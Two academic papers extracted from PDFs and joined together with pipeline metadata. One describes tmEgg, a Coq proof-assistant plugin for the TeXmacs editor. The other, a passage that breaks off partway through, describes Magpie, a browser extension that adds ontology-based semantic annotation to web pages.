"google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], 
[5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 12549, null]], "pdf_page_numbers": [[0, 175, 1], [175, 200, 2], [200, 343, 3], [343, 701, 4], [701, 852, 5], [852, 1155, 6], [1155, 1646, 7], [1646, 2196, 8], [2196, 2607, 9], [2607, 2974, 10], [2974, 4065, 11], [4065, 6286, 12], [6286, 6596, 13], [6596, 6952, 14], [6952, 7452, 15], [7452, 7492, 16], [7492, 7874, 17], [7874, 8386, 18], [8386, 8902, 19], [8902, 9139, 20], [9139, 9793, 21], [9793, 9983, 22], [9983, 10213, 23], [10213, 10507, 24], [10507, 10667, 25], [10667, 10861, 26], [10861, 10936, 27], [10936, 11044, 28], [11044, 11211, 29], [11211, 11388, 30], [11388, 11556, 31], [11556, 12047, 32], [12047, 12549, 33]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 12549, 0.14754]]}
olmocr_science_pdfs
2024-11-28
2024-11-28
c0bcff04298d753834e980ca9765eae6827b4f5d
A Document-Oriented Coq Plugin for TeXmacs

Herman Geuvers, Lionel Elie Mamane

10th August 2006

Abstract

This article discusses the integration of the authoring of a mathematical document with the formalisation of the mathematics contained in that document. To achieve this we have started the development of a Coq plugin for the TeXmacs scientific editor, called tmEgg. TeXmacs allows the wysiwyg editing of mathematical documents, much in the style of LaTeX. Our plugin allows one to integrate into a TeXmacs document mathematics formalised in the Coq proof assistant: formal definitions, lemmas and proofs. The plugin is still under development. Its main current hallmark is a document-consistent interaction model, instead of the calculator-like approach usual for TeXmacs plugins. This means that the Coq code in the TeXmacs document is interpreted as one (consistent) Coq file: executing a Coq command in the document means executing it in the context (state) of all the Coq commands before it.

1 Introduction

TeXmacs ([vdH04]) is a tool for editing mathematical documents in a wysiwyg style. The input an author types is close to LaTeX, but the output is rendered directly on screen in a pretty-printed way. TeXmacs supports structured editing and it stores the files in a structured way using tags, which is close to XML. So, a TeXmacs document is a labelled tree. The labels (tags) provide information that can be used as content or display information. For a specific label, the user can choose a specific way of rendering the subtrees under a node with that label, for example rendering all subtrees in math mode. But a user may also choose a specific action for the subtrees, for example sending the subtrees as commands to the computer algebra package Maple. Of course, many labels are predefined, like in LaTeX, so a user is not starting from scratch.

TeXmacs facilitates interaction with other applications in an easy way: within TeXmacs one can open a "session", for example a Maple session, and then input text within that session is sent to a Maple process that is running in the background. The Maple output is input to the TeXmacs document in a structured way, and rendered accordingly. In this way, TeXmacs can be used as an interface for Maple, with the additional possibility to add text or mathematical formulas around the Maple session, creating a partially interactive mathematical document. Here the interaction lies in the possibility to execute parts of the document in the background application.

In this paper we present tmEgg, a Coq plugin for TeXmacs.
The plugin allows the user to call Coq from within a TeXmacs document, yielding a TeXmacs document interleaved with Coq sessions. It also provides special commands for Coq, like stating a definition or a lemma. The plugin does not provide its own proof language, but leverages any proof language that Coq understands or will understand in the future, such as [Cor06]. This means that when doing a proof, the user types actual Coq commands (usually tactics) in the TeXmacs document, which are then sent to Coq as-is, and the Coq output is rendered by TeXmacs. This is in contrast with the approach of e.g. [The03], [DF05] or [ALW06], which seek to change the way a proof is written or the way a user interface interacts with the prover (relegated to a "backend" role) in a much more fundamental way.

A crucial aspect of the plugin is that it views the sequence of Coq sessions within a document as one Coq file. So, when one opens a document and executes a command within a Coq session, first all previous Coq commands (possibly in previous Coq sessions) are executed, and the present command is then executed in the Coq state thus obtained. So the TeXmacs document as a whole also constitutes a valid Coq development. Additionally, one can backtrack to a command within a previous session, jumping to the Coq state at that point of the development. From the Coq perspective, one can thus see the TeXmacs document as documentation of the underlying Coq file. Using TeXmacs, one adds pretty-printed versions of the definitions and lemmas. The plugin further supports this by a folding (hiding) mechanism: a lemma statement has a folded version, showing only the pretty-printed (standard mathematical) statement of the lemma, and an unfolded version, showing also the Coq statement of the lemma. A further unfolding also shows the Coq proof of the lemma.

Altogether there are four ways of seeing the tmEgg TeXmacs plugin. These are not disjoint or orthogonal, but it is good to distinguish them and to consider the various requirements that they impose upon our plugin.

**A Coq interface.** One can call Coq from within TeXmacs, thus providing an interface to Coq. When the user presses the return key in a Coq interaction field, the Coq commands in this field are sent to Coq and Coq returns the result to TeXmacs. The plugin doesn't do any pretty printing of Coq output (yet), but it allows one to save a Coq development as a TeXmacs file which can be replayed. Purely as an interface, the plugin does about the same as Proof General ([Asp00]) or CoqIDE ([Teab]).

**A documented Coq formalisation.** A Coq formalisation usually has explanatory comments to give intuitions about the definitions, lemmas and proofs, or to give a mathematical (e.g. in TeX) explanation of the formal Coq code. The plugin can be used for doing just that: the traditional TeXmacs elements are used for commenting the underlying Coq file. In this respect, tmEgg can play the same role as Coqdoc ([Teab]), but also more. Coqdoc extracts document snippets (in HTML or TeX format) from specially formatted comments in Coq scripts (.v files), and creates an HTML or TeX document containing these snippets and the vernacular statements (or only the Gallina part, that is, the statements without proofs) verbatim, along with some basic pretty-printing of terms.
Where the use of Coqdoc restricts the user to choosing between having the explanatory comments rendered (as an HTML or TeX document) and interacting with Coq (in the "source" .v file), tmEgg enables the user to have both at the same time, while keeping the property that the document can be read without Coq, and exported to a format that can be read without TeXmacs (but without Coq interaction), such as HTML, PostScript, PDF, ... Taking this use case to its extreme, one arrives at a notion of *literate proving*, by analogy to literate programming.

**A mathematical document with a Coq formalisation underneath.** One can write a mathematical article in TeXmacs, like one does in LaTeX. Thus, one can take a mathematical article and extend it with formal statements and proofs. Due to the folding mechanism, the "view" of the article where everything is folded can be the original article one started with. It should be noted that, if one adds a Coq formalisation underneath this, not everything needs to be formalised: lemmas can be left unproven etc., as long as the Coq file is *consistent*, i.e. no notions are used unless they are defined. In this sense, tmEgg makes a step in the direction of the Formal Proof Sketches idea of [Wie04].

**Mathematical course notes with formal definitions and proofs.** We can use the TeXmacs document for course notes (handouts made by the teacher for students). An added value of our plugin is that we have formal definitions and proofs underneath, but we don't expect that to be a very appealing feature for students. On the other hand, we also have full access to Coq, so we can have exercises that are to be done with Coq, like "prove this statement" or "define this concept such that such and such property holds". This is comparable in its intent to ActiveMath ([MAB+01]).

In the following we present our plugin tmEgg, including some technical details and a fragment of a TeXmacs document with an underlying Coq formalisation. We will discuss the four views on the plugin mentioned above in detail. An essential difference between the tmEgg Coq plugin that we have created and other TeXmacs plugins, e.g. the one for Maple, is that we take a *document-oriented* approach. This we will describe first.

2 The document-consistent model

The TeXmacs plugins to computer algebra or proof systems usually obey a temporal model of interaction, that is, the expressions given to the plugin are evaluated in chronological order, irrespective of their relative position in the document. In other words, the TeXmacs plugin system ignores the fact that the interpreter it is interfacing with has an internal state, which is modified by the commands TeXmacs gives it and influences the results of these commands. This can lead to the document showing results that are not consistent with the natural reading order of the document, if the expressions are not evaluated in the order in which they appear, something which crops up naturally when writing a document: one sometimes goes back to improve on a previous statement or definition. Furthermore, the results shown by the document may be irreproducible, as the sequence of statements leading up to the state in which the expressions were evaluated can be lost. See figure 1 for an example: the left part shows an example of inconsistent output with the CAS Axiom.
The third (in reading order) command was executed before the second but after the first, leading to the evaluation of `a` resulting in 6, while reading the document from top to bottom would suggest it should be 5 at this point. The situation would be even worse if `a := 6` were to be deleted; the reason for `a` evaluating to 6 would be completely lost. Contrast this with the right part, showing a tmEgg Coq session. `Empty_set` is predefined in Coq's standard library, and gets redefined in the second command. However, whatever the order in which the user asks for evaluation of the commands, the result shown will always be the one in the figure. E.g. if the user asks for evaluation of the second command (defining `Empty_set` to be 5) and then asks for the evaluation of the first one, the first command will always answer "Empty_set is an inductively defined type of sort Set without any constructor", not "Empty_set is 5".

```
→ a := 5
  5
→ a
  6
```

Figure 1: Example of inconsistent and consistent output

This risk of inconsistency is naturally highly undesirable in the context of writing formal mathematics, leading to a document-consistent model of interaction: a statement is always evaluated in the context defined by evaluating all statements before it in the document, in document order, starting from a blank state.

2.1 Implementation

Coq 8.1 thankfully provides basic framework support for this, in the form of a backtrack command that can restore the state to a past point B. It works under the condition that no structure (section, definition, lemma, ...) that is currently finished was still open (incomplete) at point B. If this condition is not satisfied, tmEgg backtracks to a point before B where the condition does hold, and then replays the statements between that point and B. The arguments given to the backtrack command are derived from state information that Coq gives after completion of each command, in the prompt. tmEgg stores the information on the Coq state before a command as a state marker next to the command itself, that is, a document subtree whose rendering is the empty string. This state information consists (roughly speaking) of the number of definitions made in the current session, the list of open definitions and the number of steps made in the current open definition, if any. tmEgg also keeps track of the position in the document of the last command executed by Coq. This is used at Coq command execution time to determine whether a backtrack or a forward jump is necessary before the command can be evaluated (a small sketch of this decision logic is given at the end of section 4).

3 Presentation of tmEgg

tmEgg extends TeXmacs with Coq interaction fields. One can naturally freely interleave Coq interaction fields with usual document constructs, permitting one to interleave the formal mathematics in Coq and its presentation in LaTeX-level mathematics. Each Coq interaction can be folded away at the press of a button, as can each specific result of a command individually. The output of the previous command is automatically folded upon evaluation of a command. See figure 2 for an example: the empty circles indicate a folded part and can be clicked to unfold that part, and the full circles indicate a foldable unfolded part and can be clicked to fold it. Here, the formal counterpart to hypothesis 2 is completely folded, while the statement of lemma 3 is unfolded and its proof folded. The proof of lemma 4 is unfolded, but the result of most of its steps is folded.
1 Nested Intervals

We first give some general constructions and lemmas for nested intervals that will be used in the proof of the Intermediate Value Theorem later.

- Variable $a, b : \mathbb{N} \rightarrow \mathbb{R}$
- Hypothesis 2. $a$ is increasing, i.e. $\forall i \in \mathbb{N}(a_i \leq a_{i+1})$; $b$ is decreasing, i.e. $\forall i \in \mathbb{N}(b_i \geq b_{i+1})$; $a$ is below $b$, i.e. $\forall i \in \mathbb{N}(a_i < b_i)$; $a$ and $b$ get arbitrarily close, i.e. for every positive real number $\varepsilon$, there is an $i$ such that $b_i < a_i + \varepsilon$
- Lemma 3. $a$ is monotone, i.e. $\forall i, j \in \mathbb{N}(i \leq j \rightarrow a_i \leq a_j)$

  Coq < Lemma a_mon' : forall i j : nat, i <= j -> a i <= a j.

- Lemma 4. $b$ is monotone, i.e. $\forall i, j \in \mathbb{N}(i \leq j \rightarrow b_j \leq b_i)$

  Coq < Lemma b_mon' : forall i j : nat, i <= j -> b j <= b i.
  b_mon' < intro.
  b_mon' < set (b' := fun i : nat => [-] (b i)) in *.

  [Coq proof state display with 1 subgoal; the results of most proof steps are folded]

Figure 2: tmEgg screenshot

Note that the result of each Coq command is inserted into the document statically (and replaced upon reevaluation); this means that the results can be copied and pasted like any part of the document, but also that the saved file contains them, so that the development can be followed without running Coq, a potentially lengthy operation. As a corollary, the development can even be followed (but not independently checked) on a computer lacking Coq.

In order to help the user create the proposed "formal and informal version of the same mathematics" structure (particularly in the "mathematical document with a Coq formalisation underneath" scenario), we present the user with a menu from which a Coq statement type (such as Lemma, Hypothesis, Definition, ...) can be chosen; this creates an empty template to fill in, made of:

- the corresponding TeXmacs theorem-like environment for the informal statement;
- a foldable Coq interaction field for the formal statement;
- a foldable Coq interaction field for the body of the informal statement, if appropriate.

This is illustrated in figure 3.

![Figure 3: New statement menu, empty lemma structure]

3.1 Architecture

We have decided to try to minimise the changes to Coq itself for this project, and in particular to try not to put TeXmacs-protocol- or syntax-specific code in Coq. That is why, rather than adapting Coq to speak the TeXmacs plugin protocol by itself, we have implemented a wrapper in OCaml that translates from Coq to TeXmacs (see figure 4). We try to keep that wrapper as simple and stateless as possible, putting most of the intelligence of the plugin in Scheme in TeXmacs.

4 How well does the plugin do?

In the introduction, we have described four views (possible applications) on the tmEgg plugin.
We now want to discuss to what extent the plugin satisfies the requirements for each of those views.

**A Coq interface.** One can do Coq from within a TeXmacs document using our plugin, but, compared to well-known interfaces like Proof General ([Asp00]) and CoqIDE ([Teab]), the plugin is in particular worse in terms of the display of the proof state: the proof state is displayed inside the document, which can clutter things up. From a purely user-interface-for-theorem-provers perspective, a reserved fixed-size area for displaying the proof state is sometimes better, in particular to contain the proof state when it grows unwieldy. Other things that our plugin does not support, but that are possible to add in TeXmacs, are menus for special tactics and pretty printing (but Proof General and CoqIDE don't have this either). Pretty printing is of course interesting to add in the context of TeXmacs, because it has various LaTeX-like facilities for adding it. However, it should be noted that, if we want to use our plugin as an interface for Coq, the pretty-printed syntax should be accepted as input syntax too, so as not to confuse the user. The user may also (occasionally or structurally) prefer to use the default Coq pure text syntax rather than graphical mathematical notations; this will always be supported.

**A documented Coq formalisation.** As a documentation tool, the plugin works fine. One can easily add high-level mathematical explanations. It would be convenient to be able to load a whole (annotated, e.g. in Coqdoc syntax) Coq file into TeXmacs and then continue annotating it further; we intend to write such an import tool in the future. Note however that there is no (formal) link between the formal Coq and the high-level explanation in TeXmacs, because the high-level explanation is not a translation of the Coq code, but is added by a human. This is different from, e.g., the work in the Mowgli ([AW02]) project, where we have a high-level rendering of the formal Coq statements.

**A mathematical document with a Coq formalisation underneath.** This is a way the plugin can be used now. One would probably want to hide even more details, so more folding would be desirable, e.g. folding a whole series of lemmas into one "main lemma" which is the conclusion of that series. Thus one would be able to create a higher level of abstraction, as is usual in mathematical documents. Of course this can already be done in TeXmacs, but our plugin does not specifically propose it automatically. If such nested folding were added, it would also be advisable to be able to display the "folding structure" separately, to give the high-level structure of the document.

**Mathematical course notes with formal definitions and proofs.** In general, proof assistants are tools that require quite some maturity to be used, so we don't expect students to easily complete an exercise in their TeXmacs course notes using the underlying proof assistant Coq, i.e. as an exercise in the mathematics studied rather than as an exercise in Coq. This situation may improve in the future though, depending on the maturity of proof assistant technology. It should also be noted that the plugin does not (yet) explain/render the Coq formalised proofs, like e.g. the Helm tool ([APC+03]) does (by translating a formal proof into a mathematically readable proof). See also [AGL+F06].
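Before turning to future work, here is a small, language-neutral sketch (in Python) of the document-consistent evaluation logic described in section 2.1: given the stored state markers and the position of the last executed command, it decides whether to backtrack or to replay forward before evaluating a target command. The data structures and the encoding of state markers are entirely hypothetical; the actual plugin keeps this logic in Scheme inside TeXmacs and relies on Coq's backtrack command.

```python
from dataclasses import dataclass

@dataclass
class Command:
    text: str          # the Coq command as it appears in the document
    state_marker: int  # hypothetical encoding of the Coq state *before* this command

def plan_evaluation(commands, last_executed, target):
    """Return the actions needed so that `target` is evaluated in the context of
    all commands before it, in document order (the document-consistent model)."""
    actions = []
    if target <= last_executed:
        # The target lies at or before the last executed command: restore the
        # state recorded just before it, then re-run it.
        actions.append(("backtrack_to_state", commands[target].state_marker))
    else:
        # The target lies further down: replay every not-yet-executed command first.
        for i in range(last_executed + 1, target):
            actions.append(("send_to_coq", commands[i].text))
    actions.append(("send_to_coq", commands[target].text))
    return actions
```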
5 Future Outlooks

5.1 Mathematical input/output

Current TeXmacs interfaces to computer algebra systems include conversion to and from mathematical notations (see figure 5). Doing the same with Coq brings some difficulties in a more acute way than with a CAS:

- Different developments will call for the same notation to map to different Coq objects; there are, for example, several different implementations of the real numbers for Coq.
- Similarly, the best notation to use for the same Coq construct will vary depending on the document, on where in the document one is, or on even more subtle factors. A prime example of this is parentheses around associative operators: one usually doesn't want full parenthesisation in statements, but if one always leaves out "unnecessary" parentheses, the statement of the associativity lemma itself looks quite pointless, as do the proof steps consisting of applying the associativity lemma.
- Some Coq constructs (such as some ways to define division) need information that is not part of the usual mathematical notation (such as a proof that the divisor is not zero).

The notations will thus probably have to be highly dynamic; if making good choices automatically proves impossible, maybe a good compromise will be to let the author of the document choose on a case-by-case basis.

Once at least the conversion to mathematical notation is satisfactory, we can make a TeXmacs command that takes a Coq term (or the name of one) and whose rendering is the "nice" mathematical rendering of that term. This means that users will be able to put Coq terms in their documents and have them look like LaTeX-level mathematics.

This conversion from and to "normal" mathematical notation might also form a usable mechanism for informal and unsafe exchange of terms between different computer algebra systems and proof assistants. E.g. if the Coq goal to prove is $x^{18} - 5x^7 + 5 = 0 \land x > 2$, the user could select in the goal the expression $x^{18} - 5x^7 + 5 = 0$ (duly converted from a Coq term to mathematical notation by tmEgg), paste it into a CAS session and ask the CAS to solve that equation (where the TeXmacs-CAS integration plugin will duly convert it to the syntax of the CAS being used), to quickly check whether the goal is provable, or use the CAS as an oracle to find the roots and use knowledge of the roots to make the proof easier to write.

5.2 Communication with Coq

The wrapper currently interacts with Coq through the `coqtop -emacs` protocol, that is, the human-oriented `coqtop` protocol$^1$, very slightly extended to be more convenient for programs. However, this protocol presents a few suboptimalities for our purposes:

- There is no documented, robust way to determine whether a command you gave failed, gave a warning or succeeded. (Naturally, the existing interfaces have organically grown rules for parsing Coq's answer that will usually succeed in this task.)
- Terms are pretty-printed back to the original input syntax, which is non-trivial to parse and interpret; it has some overloading and in particular relies on typing information. In order to implement the "mathematical notation input/output" with TeXmacs, we would like to get the terms at a lower level, as trees.

We thus plan to implement a good generic interface protocol for Coq, that will hopefully be able to serve the needs of several interfaces at once. We intend to revive and extend the protocol used by Centaur and PCoq ([Teaa]).
Its main advantage is that it presents terms as trees, in an easily parsed reverse Polish notation with explicit arity. Other interfaces (as well as tmEgg) will (sometimes or always) want to get the usual pretty-printed text format, so this terms-as-trees feature will be made optional. However, this protocol in its current state does not integrate the rather new backtracking feature; we will extend it so that it does.

5.3 Miscellaneous

Once the basic framework of tmEgg has matured and works well, all kinds of small, but highly useful, features can be imagined:

- Import of Coq files containing Coqdoc document snippets, leveraging the LaTeX import of TeXmacs.
- Automatic generation of a table of Coq constructs in the document and a corresponding index.
- Similarly, a menu command to jump to the definition of a particular Coq object.
- Make any place where a Coq object (e.g. a lemma) is used a hyperlink to its definition. This could even eventually be expanded up to making tmEgg a Coq library browser.

$^1$ A tutorial to Coq is available at http://coq.inria.fr/doc/tutorial.html.

References
{"Source-Url": "http://repository.ubn.ru.nl/bitstream/handle/2066/36211/36211.pdf?sequence=1", "len_cl100k_base": 6297, "olmocr-version": "0.1.50", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 25451, "total-output-tokens": 7864, "length": "2e12", "weborganizer": {"__label__adult": 0.00033473968505859375, "__label__art_design": 0.0011949539184570312, "__label__crime_law": 0.0004274845123291016, "__label__education_jobs": 0.00801849365234375, "__label__entertainment": 0.00022304058074951172, "__label__fashion_beauty": 0.00022280216217041016, "__label__finance_business": 0.0004758834838867187, "__label__food_dining": 0.0005083084106445312, "__label__games": 0.0009331703186035156, "__label__hardware": 0.0010929107666015625, "__label__health": 0.0007791519165039062, "__label__history": 0.0004944801330566406, "__label__home_hobbies": 0.0002294778823852539, "__label__industrial": 0.0010366439819335938, "__label__literature": 0.0008969306945800781, "__label__politics": 0.0003871917724609375, "__label__religion": 0.0007524490356445312, "__label__science_tech": 0.452392578125, "__label__social_life": 0.0002560615539550781, "__label__software": 0.03875732421875, "__label__software_dev": 0.4892578125, "__label__sports_fitness": 0.0004167556762695313, "__label__transportation": 0.0005903244018554688, "__label__travel": 0.00023353099822998047}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 28880, 0.02261]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 28880, 0.34873]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 28880, 0.86493]], "google_gemma-3-12b-it_contains_pii": [[0, 367, false], [367, 3484, null], [3484, 7174, null], [7174, 10590, null], [10590, 12927, null], [12927, 15835, null], [15835, 17442, null], [17442, 20532, null], [20532, 22346, null], [22346, 25381, null], [25381, 28026, null], [28026, 28880, null]], "google_gemma-3-12b-it_is_public_document": [[0, 367, true], [367, 3484, null], [3484, 7174, null], [7174, 10590, null], [10590, 12927, null], [12927, 15835, null], [15835, 17442, null], [17442, 20532, null], [20532, 22346, null], [22346, 25381, null], [25381, 28026, null], [28026, 28880, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 28880, null]], "pdf_page_numbers": [[0, 367, 1], [367, 3484, 2], [3484, 7174, 3], [7174, 10590, 4], [10590, 12927, 5], [12927, 15835, 6], [15835, 17442, 7], [17442, 20532, 8], [20532, 22346, 9], [22346, 25381, 10], [25381, 28026, 11], [28026, 28880, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 28880, 0.0]]}
olmocr_science_pdfs
2024-12-03
2024-12-03
d89063746233f7d68c03d3391fa25d36733eb518
Magpie: supporting browsing and navigating on the semantic web

ABSTRACT

We describe several advanced functionalities of Magpie, a tool that assists users with interpreting web resources. Magpie is an extension to Internet Explorer that automatically creates a semantic layer for web pages using a user-selected ontology. Semantic layers are annotations of a web page, with a set of applicable semantic services attached to the annotated items. We argue that the ability to generate different semantic layers for a web resource is vital to support the interpretation of web pages. Moreover, the assignment of semantic web services to the entities allows users to browse their neighbourhood semantically. At the same time, the Magpie suite offers trigger functionality based on the patterns of an automatically updated semantic log. The benefits of such an approach are illustrated by a semantically enriched browsing history management.

Categories and Subject Descriptors

H.5.4 [Hypertext/Hypermedia]: Architecture, Navigation, User Issues – semantic web browsing, semantic services.

General Terms

Performance, Experimentation, Human Factors

Keywords

Semantic Web, browsing history management, semantic web services, named entity recognition

1 INTRODUCTION

A lot of research has gone into supporting the task of finding web resources, by means of 'standard' information retrieval mechanisms or by means of semantically enhanced search [6, 13]. Less attention has been paid to the task of supporting the interpretation of web pages. Annotation technologies [8, 14] allow users to associate meta-data with web resources, which can then be used to facilitate their interpretation. The annotation technologies provide a useful way to support shared interpretation, but they are very limited, mainly because the annotation is carried out manually. Hence, the quality of meta-data depends on the authors or librarians annotating the web page. The majority of web pages are not semantically annotated. This is a great obstacle in the move towards the Semantic Web [1].

Magpie is a tool supporting the interpretation of web pages and acting as a complementary knowledge source, which a user can call upon to gain instantaneous access to the background knowledge relevant to a web resource. Magpie follows a different approach from that used by most other annotation techniques: it automatically associates a semantic layer with a web resource, rather than relying on a manual annotation. This ability relies on an ontology [5], an explicit, declarative representation of a discourse. Ontologies are the cornerstone of the emerging semantic web: they provide conceptual interoperability, and allow agents to 'understand' information on the web and to collaborate with other semantically aware agents. Magpie uses ontologies to associate meaning with the information found on a web page. Based on the identified meanings, relevant services can be invoked, or value-added functionalities offered to the user.
The association between an ontology and a web resource provides an interpretative viewpoint or context for the resource in question. Indeed the overwhelming majority of web pages are created within a specific context. Some readers of a web page might be very familiar with such a context, while others might not. In the latter case, Magpie is especially beneficial, given that the context is made explicit to the reader and context-specific functionalities are provided. One incentive for this kind of research was summed up by a seminal study of how users browse the web. Tauscher and Greenberg [16] presented the following statistics on the types of actions users carry out: - 58% of pages visited are revisits, - 90% of all user actions are related to navigation, - 30% of navigation actions use the ‘Back’ button, - less than 1% of navigation actions use a history mechanism A fairly obvious conclusion from these statistics is that web users need support in capturing what they have seen previously. Current browsing history and bookmark tools are not effective. Magpie can automatically track concepts found during a browsing session using a semantic log. The log allows trigger services to be activated when a specific pattern of concepts has been found. The same log can be used as a conceptual representation of the user’s browsing history. Since all Magpie abilities are underpinned by ontological reasoning, this enables the users to use the history semantically rather than as a purely linear and temporal record of their activities. MAGPIE USAGE SCENARIO Assume a journalist is writing an article on the Knowledge Media Institute (KMi) for a magazine. She needs to gather information about the key projects led by senior KMi staff. Using a web browser with a Magpie extension, she visits the home page of the lab’s director Enrico Motta. After loading it, she wants to quickly recognize interesting concepts denoting researchers, collaborating organizations, projects, and research areas in the page. These concepts draw on an existing ontology of academic organizations, which was populated by mining databases and web resources, and is available to the external users. Fig. 1 shows the journalist’s browser with the concepts of interest highlighted using the Magpie toolbar, which extends the functionality provided by Internet Explorer. As can be seen, Magpie preserves structure of the page, and highlights the concepts upon user’s request. This approach reduces the confusion, which may occur when the content and/or appearance of a web page are altered. The Magpie toolbar (see marker ‘*’ in Fig. 1) allows users to toggle highlighting of the specific class of entities, which were annotated using an ontology-derived lexicon. The classes are ontology dependent – changing the ontology generates new toolbar buttons. As ontology represents an interpretative viewpoint we leave the choice of ontology to the user. On the right-hand side of Fig. 1 are three Magpie collectors. These are automatically filled by Magpie trigger services as the user browses. During a browsing session, the entities found on accessed web pages are asserted into a semantic log knowledge base (KB). Collectors show a semantically filtered view of the semantic log. For instance, the top two collectors in Fig. 1 show the people and projects that were recognized on any page visited during the current browsing session. 
The bottom collector shows the projects associated with any people recognized during the browsing session, which were not mentioned explicitly in any page but are known in the domain ontology. Fig. 1 shows a number of projects the four researchers from the top-right collector are associated with. One of the highlighted concepts that have semantic meaning in a given ontology is 'ScholOnto'. A right-click on the 'ScholOnto' term invokes a semantic services menu as shown in Fig. 1. The menu options depend on the class of the selected entity within a particular ontology. In our case, 'ScholOnto' is a Project, so project-related options are displayed. The user selected the 'Shares Research Areas With' service, the results of which form a list of related items shown in Fig. 2. Some of the concepts listed in Fig. 2 are not explicitly present in Fig. 1. In other words, the journalist now takes advantage of using the context in which a particular page was written. This allows her to browse orthogonally to the syntactic, author-defined links using implicit relationships among different concepts known in a particular ontology.

3 MAGPIE ARCHITECTURE
The overall goal of this project is to support interpretation of web documents with no a-priori mark-up by means of adding an ontology-derived semantic layer. The main design principles to emphasize are: the ability to extend a standard web browser, preservation of web page appearance, and separation of content and semantic annotation. The full list of principles underlying the design of Magpie is discussed in [4]. For the purposes of this paper, it is sufficient to highlight the key components; details, both conceptual and technical, of the different components are discussed in an earlier publication [4].

The web services terminology emphasizes the multiple roles played by a web browser and an ontology-based server. In line with the web services paradigm there may be many providers of the same service and many different services [15]. Currently, the Magpie central service provider is built around a suite of tools accessing a library of knowledge models containing domain ontologies, populated KBs, semantic services and a semantic log KB. The ontological representations are shared by different services, so that they interpret the same concept in the same way. Services are semantically annotated to the ontological classes, which enables us to abstract from their implementation. Some services use a semantic log KB, a feature discussed in detail further in the paper.

3.1 Magpie browser extension – IE plug-in
The Magpie Browser Extension (further 'plug-in') is embedded in the user's web browser, and is responsible for managing the interaction between the user and the semantically enriched browser. The toolbar is a graphical user interface (GUI) to the underlying functionality.

The web browser plug-in is built around a fast named entity recognition (NER) engine that recognizes and highlights ontological entities. Our NER engine uses an ontology-derived lexicon enhanced by a few simple heuristics, which works extremely fast. The lexicon entries are generated from the instances within the ontological knowledge base, which is populated from various sources (e.g. databases). The heuristics include e.g. recognition of abbreviations or people's initials. The specific rules applicable to our scenario from the previous section use the AKT reference ontology. Instead of adding more complex NER techniques to the plug-in, we are experimenting with implementing the advanced NER algorithms as (semantic web) services available upon a user's request. This leaves the actual plug-in thin and fast.

When an entity of interest is recognized in the web page, the plug-in annotates it with customized <SPAN...> tags, and links it with a relevant ontological instance/class within the chosen ontology. This process creates a semantic layer over the original document, the original content of which remains untouched. The interesting concepts and the corresponding text on the page are highlighted in response to the user pressing a particular button on the Magpie toolbar. Simultaneously with the annotation, the recognized entities are passed on to the semantic log KB, where they are recorded and used by appropriate trigger services.
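The plug-in source is not included in the paper; the following TypeScript sketch only illustrates the kind of client-side annotation step described above. The LexiconEntry shape, the function names and the data-* attributes are assumptions made for the example, not Magpie's actual markup (the paper states only that recognized entities are wrapped in customized <SPAN...> tags and linked to ontological instances).

```typescript
// Illustrative sketch: wrap occurrences of known lexicon terms in <span> elements
// carrying the ontological class, so that a toolbar can toggle highlighting per
// class and a contextual menu can later offer class-specific services.
interface LexiconEntry {
  term: string;           // surface form found in the page text
  ontologyClass: string;  // e.g. "Project", "Person", "Organization"
  instanceUri: string;    // URI of the ontological instance the term denotes
}

function annotateTextNode(node: Text, lexicon: LexiconEntry[]): void {
  for (const entry of lexicon) {
    const idx = node.data.indexOf(entry.term);
    if (idx < 0) continue;

    // Split the text node around the match and replace the match with a span.
    const matchNode = node.splitText(idx);
    matchNode.splitText(entry.term.length);

    const span = document.createElement("span");
    span.className = `magpie-${entry.ontologyClass.toLowerCase()}`;
    span.dataset.ontologyClass = entry.ontologyClass;
    span.dataset.instanceUri = entry.instanceUri;
    span.textContent = entry.term;

    matchNode.replaceWith(span);
    return; // keep the sketch simple: at most one annotation per text node
  }
}

function annotatePage(lexicon: LexiconEntry[]): void {
  // Collect the text nodes first so that rewriting the DOM does not
  // invalidate the tree walker while it is still iterating.
  const walker = document.createTreeWalker(document.body, NodeFilter.SHOW_TEXT);
  const textNodes: Text[] = [];
  for (let n = walker.nextNode(); n; n = walker.nextNode()) {
    textNodes.push(n as Text);
  }
  textNodes.forEach((t) => annotateTextNode(t, lexicon));
}
```

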